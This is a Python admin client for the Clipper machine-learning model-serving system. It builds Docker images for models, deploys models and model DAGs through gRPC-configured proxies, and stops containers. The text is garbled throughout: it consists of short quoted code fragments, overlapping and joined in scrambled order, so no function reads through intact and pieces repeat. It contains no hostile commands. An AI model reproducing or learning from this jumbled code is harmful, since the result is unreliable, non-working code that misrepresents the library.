For example, if", "timeout=5) # if r.status_code != requests.codes.ok: # raise RequestException( #", "import BytesIO as StringIO PY3 = True import grpc from", "inputtype=input_type, outputtype=output_type, stateful=stateful).SerializeToString() self.cm.grpc_client(\"zsxhku/grpcclient\", \"--addmodel %s %s %s \"%(\"localhost\",\"33333\", modelinfo))", "{url} health check failed\".format(name=name, url=url)) # break # except RequestException", "self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy %s %s %s %s\"%(container_ip, \"22222\", proxy_name, \"22223\")) #", "import CONTAINERLESS_MODEL_IMAGE, ClusterAdapter from .exceptions import ClipperException, UnconnectedException from .version", "'cluster_name': self.cm.cluster_identifier }) def start_clipper(self, mgmt_frontend_image='{}/management_frontend:{}'.format( __registry__, __version__), cache_size=DEFAULT_PREDICTION_CACHE_SIZE_BYTES): try:", "if not self.connected: # raise UnconnectedException() # model_info = self.get_all_models(verbose=True)", "of models if you specify them. You almost certainly want", "containers for these models and versions:\\n{}\".format( # pp.pformat(model_dict))) def stop_versioned_models(self,", "containers for these models and versions:\\n{}\".format( # pp.pformat(model_dict))) def stop_all_model_containers(self):", "# model_dict = {} # for m in model_info: #", "IP address at which the query frontend can be reached", "if you specify them. You almost certainly want to use", "currently deployed versions of models if you specify them. You", "Clipper cluster.\"\"\" self.cm.connect() self.connected = True self.logger.info( \"Successfully connected to", "model') runtime_dag_id = name+version+str(1) ## Starting frontend frontend_name, frontend_container_id =", "of metrics for this instance. On error, the string will", "df_tarinfo = tarfile.TarInfo('Dockerfile') df_contents.seek(0, os.SEEK_END) df_tarinfo.size = df_contents.tell() df_contents.seek(0) context_tar.addfile(df_tarinfo,", "in nodes_list: model_name,model_version,model_image = graph_parser.get_name_version(model_info) container_name, container_id, host = self.cm.add_replica(model_name,", "\"2375\") def add_model(self, model_name, model_version, image, input_type=\"string\", output_type=\"string\", stateful=False): modelinfo", ": list(str) The names of the models whose old containers", "run_command=run_cmd))) df_tarinfo = tarfile.TarInfo('Dockerfile') df_contents.seek(0, os.SEEK_END) df_tarinfo.size = df_contents.tell() df_contents.seek(0)", "models. 
For example, if you have deployed versions 1, 2,", "container_id) proxy_name, proxy_id = self.cm.set_proxy(\"mxschen/ai-proxy:latest\", container_name, container_ip, host) ## get", "backup_host) backup_proxy_ip= self.cm.get_container_ip(backup_host, backup_proxy_id) backup_info.append([backup_name, backup_id, backup_ip, backup_proxy_name, backup_proxy_id, backup_proxy_ip])", "for Test; Not Windows Compatible logging.basicConfig( format='%(asctime)s %(levelname)-8s %(message)s', datefmt='%y-%m-%d:%H:%M:%S',", "and not m[\"is_current_version\"]: # if m[\"model_name\"] in model_dict: # model_dict[m[\"model_name\"]].append(m[\"model_version\"])", "for tup in proxy_info: proxy_name = tup[0] proxy_id = tup[1]", "while True: # try: # query_frontend_url = \"http://{host}/metrics\".format( # host=self.cm.get_query_addr())", "proxy {proxy_name} '.format(proxy_name=proxy_name)) #tells the backups runtime dag info for", "1 and 2 but will leave containers serving version 3", "model {name}:{version}.\".format( name=name, version=version)) def connect_host(self, host_ip, host_port): self.cm.connect_host(host_ip, \"2375\")", "# time.sleep(1) self.logger.info(\"Clipper is running\") self.connected = True except ClipperException", "the models whose old containers you want to stop. Raises", "as context_file: # Create build context tarfile with tarfile.TarFile( fileobj=context_file,", ")) self.logger.info('[DEPLOYMENT] Finished setting model info to proxy') if(graph_parser.is_stateful(model_info)): self.cm.grpc_client(\"zsxhku/grpcclient\",", "= graph_parser.expand_dag(dag_description_, name, version, container_info, proxy_info, backup_info, frontend_info) self.runtime_dag =", "Parameters ---------- model_names : list(str) The names of the models", "self.cm.get_container_ip(host, proxy_id) proxy_info.append([proxy_name,proxy_id,proxy_ip]) container_info.append([container_name, container_id, container_ip]) if graph_parser.is_stateful(model_info): backup_name, backup_id,", "UnconnectedException() version = str(version) _validate_versioned_model_name(name, version) self.cm.deploy_model( name=name, version=version, input_type=input_type,", "{name}: a model name must be a valid DNS-1123 \"", "specified models. Parameters ---------- model_versions_dict : dict(str, list(str)) For each", "is not None: image = \"{reg}/{image}\".format( reg=container_registry, image=image) docker_client =", "version) run_cmd = '' if pkgs_to_install: run_as_lst = 'RUN apt-get", "the query frontend can be reached request predictions. Returns -------", "---------- model_names : list(str) The names of the models whose", "df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents) except TypeError: df_contents = StringIO( \"FROM {container_name}\\n{run_command}\\nCOPY", "self.connected: raise UnconnectedException() version = str(version) _validate_versioned_model_name(name, version) self.cm.deploy_model( name=name,", "+ pkgs_to_install) with tempfile.NamedTemporaryFile( mode=\"w+b\", suffix=\"tar\") as context_file: # Create", "# self.cm.stop_models(model_versions_dict) # pp = pprint.PrettyPrinter(indent=4) # self.logger.info( # \"Stopped", "\"\"\"Fetches performance metrics from the running Clipper cluster. 
Returns -------", "instances proxy_ip = self.cm.get_container_ip(host, proxy_id) proxy_info.append([proxy_name,proxy_id,proxy_ip]) container_info.append([container_name, container_id, container_ip]) if", "re import os import tarfile import sys from cloudpickle import", "deploy_regex_str = \"[a-z0-9]([-a-z0-9]*[a-z0-9])?\\Z\" deployment_regex = re.compile(deploy_regex_str) def _validate_versioned_model_name(name, version): if", "# name, # version, # input_type, # image=image, # labels=labels,", "---- This method will stop the currently deployed versions of", "model_name, model_version, image, input_type=\"string\", output_type=\"string\", stateful=False): modelinfo = management_pb2.ModelInfo(modelname=model_name, modelversion=model_version,", "container_ip]) if graph_parser.is_stateful(model_info): backup_name, backup_id, backup_host = self.cm.add_replica(model_name, model_version, \"22222\",", "name, # version, # input_type, # image=image, # labels=labels, #", "from cStringIO import StringIO except ImportError: from StringIO import StringIO", "calling ``connect`` first. \"\"\" self.cm.stop_all_model_containers() self.logger.info(\"Stopped all Clipper model containers\")", "def build_and_deploy_model(self, name, version, input_type, model_data_path, base_image, labels=None, container_registry=None, num_replicas=1,", "-y install build-essential && pip install'.split( ' ') run_cmd =", "# labels=labels, # batch_size=batch_size) self.logger.info(\"Done deploying model {name}:{version}.\".format( name=name, version=version))", "stop any containers serving versions 1 and 2 but will", "= self.cm.set_proxy(\"mxschen/ai-proxy:latest\", backup_name, backup_ip, backup_host) backup_proxy_ip= self.cm.get_container_ip(backup_host, backup_proxy_id) backup_info.append([backup_name, backup_id,", "cluster at {}\".format( self.cm.get_query_addr())) def build_and_deploy_DAG(self, name, version, dag_description, labels):", "version of each model will be stopped. \"\"\" # if", "------- str The JSON string containing the current set of", "return image def deploy_model(self, name, version, input_type, image, labels=None, num_replicas=1,", "dag_description_=self.get_dag_description() nodes_list = graph_parser.get_all_nodes(dag_description_) container_info = [] proxy_info = []", "RequestException( # \"{name} end point {url} health check failed\".format(name=name, url=url))", "be stopped. \"\"\" if not self.connected: raise UnconnectedException() return self.cm.get_query_addr()", "# Used Internally for Test; Not Windows Compatible logging.basicConfig( format='%(asctime)s", "= 'RUN apt-get -y install build-essential && pip install'.split( '", "batch_size) def build_model(self, name, version, model_data_path, base_image, container_registry=None, pkgs_to_install=None): version", ": dict(str, list(str)) For each entry in the dict, the", "replicas of all versions of each model specified in the", "try: # query_frontend_url = \"http://{host}/metrics\".format( # host=self.cm.get_query_addr()) # mgmt_frontend_url =", "raise UnconnectedException() # self.cm.stop_models(model_versions_dict) # pp = pprint.PrettyPrinter(indent=4) # self.logger.info(", "for tup in backup_info: if tup: self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setdag %s %s", "in the list will be stopped. 
Raises ------ :py:exc:`clipper.UnconnectedException` versions.", "%s %s %s %s %s\"%(proxy_ip, \"22223\", container_name, count, container_ip, \"22222\"", "model_image, runtime=runtime) self.logger.info(\"Started %s with container %s:%s (HOST:%s)\"%(model_name, container_name, container_id,", "https://stackoverflow.com/a/740854/814642 try: df_contents = StringIO( str.encode( \"FROM {container_name}\\n{run_command}\\nCOPY {data_path} /model/\\n\".", "dag info for tup in proxy_info: proxy_name = tup[0] proxy_id", "= logging.getLogger(__name__) deploy_regex_str = \"[a-z0-9]([-a-z0-9]*[a-z0-9])?\\Z\" deployment_regex = re.compile(deploy_regex_str) def _validate_versioned_model_name(name,", "self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel %s %s %s %s %s %s\"%(proxy_ip, \"22223\", container_name,", "# for m in model_info: # if m[\"model_name\"] in model_names:", "for these models and versions:\\n{}\".format( # pp.pformat(model_dict))) def stop_versioned_models(self, model_versions_dict):", "running Clipper cluster.\"\"\" self.cm.connect() self.connected = True self.logger.info( \"Successfully connected", "# if m[\"model_name\"] in model_names: # if m[\"model_name\"] in model_dict:", "def build_and_deploy_DAG(self, name, version, dag_description, labels): if not self.connected: raise", "self.cm.add_replica(model_name, model_version, \"22222\", model_image) self.logger.info(\"[Backup] Started %s with container %s:%s", "# pp = pprint.PrettyPrinter(indent=4) # self.logger.info( # \"Stopped all containers", "{} # for m in model_info: # if m[\"model_name\"] in", "The JSON string containing the current set of metrics for", "df_contents.seek(0, os.SEEK_END) df_tarinfo.size = df_contents.tell() df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents) # Exit", "not None: image = \"{reg}/{image}\".format( reg=container_registry, image=image) docker_client = docker.from_env()", "all versions of a model when calling :py:meth:`clipper_admin.ClipperConnection.stop_versioned_models`. Parameters ----------", "{data_path} /model/\\n\". format( container_name=base_image, data_path=model_data_path, run_command=run_cmd)) df_tarinfo = tarfile.TarInfo('Dockerfile') df_contents.seek(0,", "graph_parser.is_stateful(model_info): backup_name, backup_id, backup_host = self.cm.add_replica(model_name, model_version, \"22222\", model_image) self.logger.info(\"[Backup]", "pkgs_to_install=None): version = str(version) _validate_versioned_model_name(name, version) run_cmd = '' if", "called without calling ``connect`` first. \"\"\" self.cm.stop_all_model_containers() self.logger.info(\"Stopped all Clipper", "self.connected: # raise UnconnectedException() # self.cm.stop_models(model_versions_dict) # pp = pprint.PrettyPrinter(indent=4)", "self.logger.info(\"[DEPLOYMENT] ################ Started Frontend #################\") #expand the dag description with", "1 # self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy %s %s %s %s\"%(container_ip, \"22222\", proxy_name,", "import __version__, __registry__ from . import graph_parser DEFAULT_LABEL = []", "self.logger.info(\"Pushing model Docker image to {}\".format(image)) for line in docker_client.images.push(repository=image,", "import re import os import tarfile import sys from cloudpickle", "of the specified models. 
DEFAULT_LABEL = []
DEFAULT_PREDICTION_CACHE_SIZE_BYTES = 33554432
CLIPPER_TEMP_DIR = "/tmp/clipper"  # Used Internally for Test; Not Windows Compatible

logging.basicConfig(
    format='%(asctime)s %(levelname)-8s %(message)s',
    datefmt='%y-%m-%d:%H:%M:%S',
    level=logging.INFO)

# logging.basicConfig(
#     format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
#     datefmt='%y-%m-%d:%H:%M:%S',
#     level=logging.INFO)

logger = logging.getLogger(__name__)

deploy_regex_str = r"[a-z0-9]([-a-z0-9]*[a-z0-9])?\Z"
deployment_regex = re.compile(deploy_regex_str)


def _validate_versioned_model_name(name, version):
    if deployment_regex.match(name) is None:
        raise ClipperException(
            "Invalid value: {name}: a model name must be a valid DNS-1123 "
            "subdomain. It must consist of lower case "
            "alphanumeric characters, '-' or '.', and must start and end with "
            "an alphanumeric character (e.g. 'example.com', regex used for "
            "validation is '{reg}'".format(name=name, reg=deploy_regex_str))
    if deployment_regex.match(version) is None:
        raise ClipperException(
            "Invalid value: {version}: a model version must be a valid DNS-1123 "
            "subdomain. It must consist of lower case "
            "alphanumeric characters, '-' or '.', and must start and end with "
            "an alphanumeric character (e.g. 'example.com', regex used for "
            "validation is '{reg}'".format(version=version, reg=deploy_regex_str))
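
# A quick illustration of the validator above (values are hypothetical): the
# regex only accepts lowercase alphanumerics and '-', so the first call
# passes silently while the second raises ClipperException.
#
#   _validate_versioned_model_name("music-recommender", "1")   # ok
#   _validate_versioned_model_name("Music_Recommender", "1")   # raises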

class ClipperConnection(object):
    def __init__(self, container_manager):
        self.connected = False
        self.cm = container_manager
        #############TEST################
        self.runtime_dag = ""
        self.lock = False
        #################################
        self.logger = ClusterAdapter(logger, {
            'cluster_name': self.cm.cluster_identifier
        })

    def start_clipper(self,
                      mgmt_frontend_image='{}/management_frontend:{}'.format(
                          __registry__, __version__),
                      cache_size=DEFAULT_PREDICTION_CACHE_SIZE_BYTES):
        try:
            self.cm.start_clipper(mgmt_frontend_image)
            # while True:
            #     try:
            #         query_frontend_url = "http://{host}/metrics".format(
            #             host=self.cm.get_query_addr())
            #         mgmt_frontend_url = "http://{host}/admin/ping".format(
            #             host=self.cm.get_admin_addr())
            #         for name, url in [('query frontend', query_frontend_url),
            #                           ('management frontend', mgmt_frontend_url)]:
            #             r = requests.get(url, timeout=5)
            #             if r.status_code != requests.codes.ok:
            #                 raise RequestException(
            #                     "{name} end point {url} health check failed".format(
            #                         name=name, url=url))
            #         break
            #     except RequestException as e:
            #         self.logger.info("Clipper still initializing: \n {}".format(e))
            #         time.sleep(1)
            self.logger.info("Clipper is running")
            self.connected = True
        except ClipperException as e:
            self.logger.warning("Error starting Clipper: {}".format(e.msg))
            raise e

    def connect(self):
        """Connect to a running Clipper cluster."""
        self.cm.connect()
        self.connected = True
        self.logger.info(
            "Successfully connected to Clipper cluster at {}".format(
                self.cm.get_query_addr()))

    def build_and_deploy_DAG(self, name, version, dag_description, labels):
        if not self.connected:
            raise UnconnectedException()

    def build_and_deploy_model(self,
                               name,
                               version,
                               input_type,
                               model_data_path,
                               base_image,
                               labels=None,
                               container_registry=None,
                               num_replicas=1,
                               batch_size=-1,
                               pkgs_to_install=None):
        if not self.connected:
            raise UnconnectedException()
        image = self.build_model(name, version, model_data_path, base_image,
                                 container_registry, pkgs_to_install)
        self.deploy_model(name, version, input_type, image, labels,
                          num_replicas, batch_size)
    def build_model(self,
                    name,
                    version,
                    model_data_path,
                    base_image,
                    container_registry=None,
                    pkgs_to_install=None):
        version = str(version)
        _validate_versioned_model_name(name, version)
        run_cmd = ''
        if pkgs_to_install:
            run_as_lst = 'RUN apt-get -y install build-essential && pip install'.split(
                ' ')
            run_cmd = ' '.join(run_as_lst + pkgs_to_install)
        with tempfile.NamedTemporaryFile(
                mode="w+b", suffix="tar") as context_file:
            # Create build context tarfile
            with tarfile.TarFile(
                    fileobj=context_file, mode="w") as context_tar:
                context_tar.add(model_data_path)
                # From https://stackoverflow.com/a/740854/814642
                try:
                    df_contents = StringIO(
                        str.encode(
                            "FROM {container_name}\n{run_command}\nCOPY {data_path} /model/\n".
                            format(
                                container_name=base_image,
                                data_path=model_data_path,
                                run_command=run_cmd)))
                    df_tarinfo = tarfile.TarInfo('Dockerfile')
                    df_contents.seek(0, os.SEEK_END)
                    df_tarinfo.size = df_contents.tell()
                    df_contents.seek(0)
                    context_tar.addfile(df_tarinfo, df_contents)
                except TypeError:
                    df_contents = StringIO(
                        "FROM {container_name}\n{run_command}\nCOPY {data_path} /model/\n".
                        format(
                            container_name=base_image,
                            data_path=model_data_path,
                            run_command=run_cmd))
                    df_tarinfo = tarfile.TarInfo('Dockerfile')
                    df_contents.seek(0, os.SEEK_END)
                    df_tarinfo.size = df_contents.tell()
                    df_contents.seek(0)
                    context_tar.addfile(df_tarinfo, df_contents)
            # Exit Tarfile context manager to finish the tar file
            # Seek back to beginning of file for reading
            context_file.seek(0)
            image = "{cluster}-{name}:{version}".format(
                cluster=self.cm.cluster_identifier, name=name, version=version)
            if container_registry is not None:
                image = "{reg}/{image}".format(
                    reg=container_registry, image=image)
            docker_client = docker.from_env()
            self.logger.info(
                "Building model Docker image with model data from {}".format(
                    model_data_path))
            image_result, build_logs = docker_client.images.build(
                fileobj=context_file, custom_context=True, tag=image)
            for b in build_logs:
                if 'stream' in b and b['stream'] != '\n':  # log build steps only
                    self.logger.info(b['stream'].rstrip())
        self.logger.info("Pushing model Docker image to {}".format(image))
        for line in docker_client.images.push(repository=image, stream=True):
            self.logger.debug(line)
        return image
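
    # For the hypothetical build_and_deploy_model sketch earlier, the
    # in-memory Dockerfile generated above would read roughly:
    #
    #   FROM python:3.7-slim
    #   RUN apt-get -y install build-essential && pip install numpy
    #   COPY /tmp/sum_model /model/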
\"\"\" # if not self.connected: # raise", "name, version, 'old' , self.cm.admin_ip, self.cm.admin_port, expanded_dag)) self.logger.info(\"Added new runtime", "= True except ClipperException as e: self.logger.warning(\"Error starting Clipper: {}\".format(e.msg))", "prediction_pb2_grpc from .rpc import prediction_pb2 from .rpc import management_pb2 from", "image=image, num_replicas=num_replicas) # self.register_model( # name, # version, # input_type,", "version = str(version) _validate_versioned_model_name(name, version) self.cm.deploy_model( name=name, version=version, input_type=input_type, image=image,", "not effect in Kubernetes. \"\"\" self.cm.stop_all(graceful=graceful) self.logger.info( \"Stopped all Clipper", "error, the string will be an error message (not JSON", "will not affect Redis. It can also be called without", "self.logger = ClusterAdapter(logger, { 'cluster_name': self.cm.cluster_identifier }) def start_clipper(self, mgmt_frontend_image='{}/management_frontend:{}'.format(", "# pp.pformat(model_dict))) def stop_all_model_containers(self): \"\"\"Stops all model containers started via", "def __init__(self, container_manager): self.connected = False self.cm = container_manager #############TEST################", "model_version, \"22222\", model_image, runtime=runtime) self.logger.info(\"Started %s with container %s:%s (HOST:%s)\"%(model_name,", "\"22222\", proxy_name, \"22223\")) # self.logger.info('[DEPLOYMENT] Finished setting proxy info to", "specified models. For example, if you have deployed versions 1,", "df_contents = StringIO( str.encode( \"FROM {container_name}\\n{run_command}\\nCOPY {data_path} /model/\\n\". format( container_name=base_image,", "r = requests.get(url, timeout=5) # if r.status_code != requests.codes.ok: #", "from google.protobuf.json_format import MessageToDict if sys.version_info < (3, 0): try:", "raise ClipperException( \"Invalid value: {name}: a model name must be", "Clipper will issue Docker Kill if it's in the Docker", "True import grpc from .rpc import model_pb2_grpc from .rpc import", "version must be a valid DNS-1123 \" \" subdomain. It", "\"22223\")) # self.logger.info('[DEPLOYMENT] Finished setting proxy info to model') #", "from .exceptions import ClipperException, UnconnectedException from .version import __version__, __registry__", "from .version import __version__, __registry__ from . import graph_parser DEFAULT_LABEL", "UnconnectedException() # model_info = self.get_all_models() dag_description_ = dag_description #self.logger.info(\"dag_description: %s\"%(dag_description_))", "starting Clipper: {}\".format(e.msg)) raise e def connect(self): \"\"\"Connect to a", "[frontend_name, frontend_container_id, frontend_ip] self.logger.info(\"[DEPLOYMENT] ################ Started Frontend #################\") #expand the", "effect in Kubernetes. \"\"\" self.cm.stop_all(graceful=graceful) self.logger.info( \"Stopped all Clipper cluster", "import StringIO except ImportError: from StringIO import StringIO PY3 =", "stateful=False): modelinfo = management_pb2.ModelInfo(modelname=model_name, modelversion=model_version, image=image, inputtype=input_type, outputtype=output_type, stateful=stateful).SerializeToString() self.cm.grpc_client(\"zsxhku/grpcclient\",", "1 for model_info in nodes_list: model_name,model_version,model_image = graph_parser.get_name_version(model_info) container_name, container_id,", "proxy_ip = tup[2] self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setdag %s %s %s\"%(proxy_ip, \"22223\", expanded_dag))", "the Docker Mode. 
This parameter will take not effect in", "modelinfo)) return def deploy_DAG(self, name, version, dag_description=None, runtime=\"\"): if not", "import graph_parser DEFAULT_LABEL = [] DEFAULT_PREDICTION_CACHE_SIZE_BYTES = 33554432 CLIPPER_TEMP_DIR =", "deployed versions of models if you specify them. You almost", "__version__, __registry__ from . import graph_parser DEFAULT_LABEL = [] DEFAULT_PREDICTION_CACHE_SIZE_BYTES", "Docker image with model data from {}\".format( model_data_path)) image_result, build_logs", "running\") self.connected = True except ClipperException as e: self.logger.warning(\"Error starting", "df_contents.tell() df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents) except TypeError: df_contents = StringIO( \"FROM", "Clipper management frontend or Redis has crashed. It can also", "'stream' in b and b['stream'] != '\\n': #log build steps", "None: raise ClipperException( \"Invalid value: {version}: a model version must", "is '{reg}'\".format(name=name, reg=deploy_regex_str)) if deployment_regex.match(version) is None: raise ClipperException( \"Invalid", "request predictions. Returns ------- str The address as an IP", "can be used to clean up leftover Clipper model containers", "the backups runtime dag info for tup in backup_info: if", "= pprint.PrettyPrinter(indent=4) # self.logger.info( # \"Stopped all containers for these", "character (e.g. 'example.com', regex used for \" \"validation is '{reg}'\".format(", "= docker_client.images.build( fileobj=context_file, custom_context=True, tag=image) for b in build_logs: if", "list(str) A list of model names. All replicas of all", "data from {}\".format( model_data_path)) image_result, build_logs = docker_client.images.build( fileobj=context_file, custom_context=True,", "admin commands. This includes the query and management frontend Docker", "the other stop_* methods. Use with caution. \"\"\" # if", "as context_tar: context_tar.add(model_data_path) # From https://stackoverflow.com/a/740854/814642 try: df_contents = StringIO(", "docker import tempfile import requests from requests.exceptions import RequestException import", "version, container_info, proxy_info, backup_info, frontend_info) self.runtime_dag = expanded_dag # TODO:", "model will be stopped. \"\"\" if not self.connected: raise UnconnectedException()", "convenience method to avoid the need to explicitly list all", "will take not effect in Kubernetes. \"\"\" self.cm.stop_all(graceful=graceful) self.logger.info( \"Stopped", "\"\"\"Get the IP address at which the query frontend can", "container_info.append([container_name, container_id, container_ip]) if graph_parser.is_stateful(model_info): backup_name, backup_id, backup_host = self.cm.add_replica(model_name,", "tarfile with tarfile.TarFile( fileobj=context_file, mode=\"w\") as context_tar: context_tar.add(model_data_path) # From", "model_version, \"22222\", model_image) self.logger.info(\"[Backup] Started %s with container %s:%s (HOST:%s)\"%(model_name,", "for each version of each model will be stopped. 
Note", "self.build_model(name, version, model_data_path, base_image, container_registry, pkgs_to_install) self.deploy_model(name, version, input_type, image,", "\"22223\", expanded_dag)) self.logger.info('[DEPLOYMENT][Backup] Finished setting DAG for proxy {proxy_name} '.format(proxy_name=tup[-1]))", "versions:\\n{}\".format( # pp.pformat(model_versions_dict))) def stop_inactive_model_versions(self, model_names): \"\"\"Stops all model containers", "#expand the dag description with the model/proxy instances info expanded_dag", "= graph_parser.get_name_version(model_info) container_name, container_id, host = self.cm.add_replica(model_name, model_version, \"22222\", model_image,", "affect Redis. It can also be called without calling ``connect``", "from io import BytesIO as StringIO PY3 = True import", "Finished setting proxy info to model') runtime_dag_id = name+version+str(1) ##", "3 untouched. Parameters ---------- model_names : list(str) The names of", "Redis. It can also be called without calling ``connect`` first.", "from the running Clipper cluster. Returns ------- str The JSON", "model containers started via Clipper admin commands. This method can", "e: self.logger.warning(\"Error starting Clipper: {}\".format(e.msg)) raise e def connect(self): \"\"\"Connect", "------ :py:exc:`clipper.UnconnectedException` versions. All replicas for each version of each", "raise UnconnectedException() # model_info = self.get_all_models(verbose=True) # model_dict = {}", "containers. If you started Redis independently, this will not affect", ":py:exc:`clipper.UnconnectedException` :py:exc:`clipper.ClipperException` \"\"\" def get_query_addr(self): \"\"\"Get the IP address at", "# if r.status_code != requests.codes.ok: # raise RequestException( # \"{name}", "fileobj=context_file, mode=\"w\") as context_tar: context_tar.add(model_data_path) # From https://stackoverflow.com/a/740854/814642 try: df_contents", "tarfile.TarInfo('Dockerfile') df_contents.seek(0, os.SEEK_END) df_tarinfo.size = df_contents.tell() df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents) except", "self.connected = False self.cm = container_manager #############TEST################ self.runtime_dag = \"\"", "if(graph_parser.is_stateful(model_info)): self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel %s %s %s %s %s %s\"%(backup_info[-1][-1], \"22223\",", "setting DAG for proxy {proxy_name} '.format(proxy_name=proxy_name)) #tells the backups runtime", "version=version)) def connect_host(self, host_ip, host_port): self.cm.connect_host(host_ip, \"2375\") def add_model(self, model_name,", "= dag_description #self.logger.info(\"dag_description: %s\"%(dag_description_)) #if(dag_description==None): # dag_description_=self.get_dag_description() nodes_list = graph_parser.get_all_nodes(dag_description_)", "import time import re import os import tarfile import sys", "tup[2] self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setdag %s %s %s\"%(proxy_ip, \"22223\", expanded_dag)) self.logger.info('[DEPLOYMENT] Finished", "cache_size=DEFAULT_PREDICTION_CACHE_SIZE_BYTES): try: self.cm.start_clipper(mgmt_frontend_image) # while True: # try: # query_frontend_url", "be stopped. Note ---- This method will stop the currently", "management frontend or Redis has crashed. It can also be", "with \" \"an alphanumeric character (e.g. 
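
    # Sketch of registering a model with the admin daemon through the gRPC
    # client container; "localhost:33333" is the hard-coded admin address
    # used above, the model values are hypothetical:
    #
    #   clipper_conn.add_model("sum-model", "1", "sum-model:1",
    #                          input_type="string", output_type="string",
    #                          stateful=False)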
    def deploy_DAG(self, name, version, dag_description=None, runtime=""):
        if not self.connected:
            raise UnconnectedException()
        # model_info = self.get_all_models()
        dag_description_ = dag_description
        # self.logger.info("dag_description: %s" % (dag_description_))
        # if dag_description is None:
        #     dag_description_ = self.get_dag_description()
        nodes_list = graph_parser.get_all_nodes(dag_description_)
        container_info = []
        proxy_info = []
        backup_info = []
        count = 1
        for model_info in nodes_list:
            model_name, model_version, model_image = graph_parser.get_name_version(
                model_info)
            container_name, container_id, host = self.cm.add_replica(
                model_name, model_version, "22222", model_image, runtime=runtime)
            self.logger.info("Started %s with container %s:%s (HOST:%s)" % (
                model_name, container_name, container_id, host))
            container_ip = self.cm.get_container_ip(host, container_id)
            proxy_name, proxy_id = self.cm.set_proxy(
                "mxschen/ai-proxy:latest", container_name, container_ip, host)
            ## get the ip of the instances
            proxy_ip = self.cm.get_container_ip(host, proxy_id)
            proxy_info.append([proxy_name, proxy_id, proxy_ip])
            container_info.append([container_name, container_id, container_ip])
            if graph_parser.is_stateful(model_info):
                backup_name, backup_id, backup_host = self.cm.add_replica(
                    model_name, model_version, "22222", model_image)
                self.logger.info("[Backup] Started %s with container %s:%s (HOST:%s)" % (
                    model_name, backup_name, backup_id, backup_host))
                backup_ip = self.cm.get_container_ip(backup_host, backup_id)
                backup_proxy_name, backup_proxy_id = self.cm.set_proxy(
                    "mxschen/ai-proxy:latest", backup_name, backup_ip, backup_host)
                backup_proxy_ip = self.cm.get_container_ip(backup_host, backup_proxy_id)
                backup_info.append([backup_name, backup_id, backup_ip,
                                    backup_proxy_name, backup_proxy_id,
                                    backup_proxy_ip])
            else:
                backup_info.append([])
            # self.cm.check_container_status(host, container_id, 0.3, 20)
            # self.cm.check_container_status(host, proxy_id, 0.3, 20)
            # time.sleep(25)
            # self.logger.info("proxy_ip:%s" % (proxy_ip))
            self.cm.grpc_client(
                "zsxhku/grpcclient",
                "--setmodel %s %s %s %s %s %s" % (proxy_ip, "22223",
                                                  container_name, count,
                                                  container_ip, "22222"))
            self.logger.info('[DEPLOYMENT] Finished setting model info to proxy')
            if graph_parser.is_stateful(model_info):
                self.cm.grpc_client(
                    "zsxhku/grpcclient",
                    "--setmodel %s %s %s %s %s %s" % (backup_info[-1][-1], "22223",
                                                      backup_info[-1][0], count,
                                                      backup_info[-1][2], "22222"))
                self.logger.info('[DEPLOYMENT][Backup] Finished setting model info to proxy')
            count += 1
            # self.cm.grpc_client("zsxhku/grpcclient", "--setproxy %s %s %s %s"
            #                     % (container_ip, "22222", proxy_name, "22223"))
            # self.logger.info('[DEPLOYMENT] Finished setting proxy info to model')
            # if graph_parser.is_stateful(model_info):
            #     self.cm.grpc_client("zsxhku/grpcclient", "--setproxy %s %s %s %s"
            #                         % (backup_info[-1][2], "22222", backup_info[-1][3], "22223"))
            #     self.logger.info('[DEPLOYMENT][Backup] Finished setting proxy info to model')

        runtime_dag_id = name + version + str(1)
        ## Starting frontend
        frontend_name, frontend_container_id = self.cm.add_frontend(
            "localhost", "mxschen/frontend", runtime_dag_id, proxy_info[0][2],
            "22223", max_workers=2048)
        frontend_ip = self.cm.get_container_ip("localhost", frontend_container_id)
        frontend_info = [frontend_name, frontend_container_id, frontend_ip]
        self.logger.info("[DEPLOYMENT] ################ Started Frontend #################")
        # expand the dag description with the model/proxy instances info
        expanded_dag = graph_parser.expand_dag(dag_description_, name, version,
                                               container_info, proxy_info,
                                               backup_info, frontend_info)
        self.runtime_dag = expanded_dag
        # TODO: need to modularize
        self.cm.grpc_client(
            "zsxhku/grpcclient",
            "--addruntimedag %s %s %s %s %s %s %s" % ('1', name, version, 'old',
                                                      self.cm.admin_ip,
                                                      self.cm.admin_port,
                                                      expanded_dag))
        self.logger.info("Added new runtime DAG to admin daemon\n%s" % (expanded_dag))
        # tells the proxies the runtime dag info
        for tup in proxy_info:
            proxy_name = tup[0]
            proxy_id = tup[1]
            proxy_ip = tup[2]
            self.cm.grpc_client(
                "zsxhku/grpcclient",
                "--setdag %s %s %s" % (proxy_ip, "22223", expanded_dag))
            self.logger.info('[DEPLOYMENT] Finished setting DAG for proxy {proxy_name} '.format(
                proxy_name=proxy_name))
        # tells the backups the runtime dag info
        for tup in backup_info:
            if tup:
                self.cm.grpc_client(
                    "zsxhku/grpcclient",
                    "--setdag %s %s %s" % (tup[-1], "22223", expanded_dag))
                self.logger.info('[DEPLOYMENT][Backup] Finished setting DAG for proxy {proxy_name} '.format(
                    proxy_name=tup[-1]))
        return
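
    # End-to-end sketch of a DAG deployment, assuming `dag` is a description
    # string in whatever format graph_parser.get_all_nodes() expects and the
    # referenced model images have already been built:
    #
    #   clipper_conn.connect()
    #   clipper_conn.deploy_DAG("pipeline", "1", dag_description=dag)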
    def inspect_instance(self):
        """Fetches performance metrics from the running Clipper cluster.

        Returns
        -------
        str
            The JSON string containing the current set of metrics for this
            instance. On error, the string will be an error message (not
            JSON formatted).

        Raises
        ------
        :py:exc:`clipper.UnconnectedException`
        :py:exc:`clipper.ClipperException`
        """

    def get_query_addr(self):
        """Get the IP address at which the query frontend can be reached to
        request predictions.

        Returns
        -------
        str
            The address as an IP address or hostname.

        Raises
        ------
        :py:exc:`clipper.UnconnectedException`
        """
        if not self.connected:
            raise UnconnectedException()
        return self.cm.get_query_addr()
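
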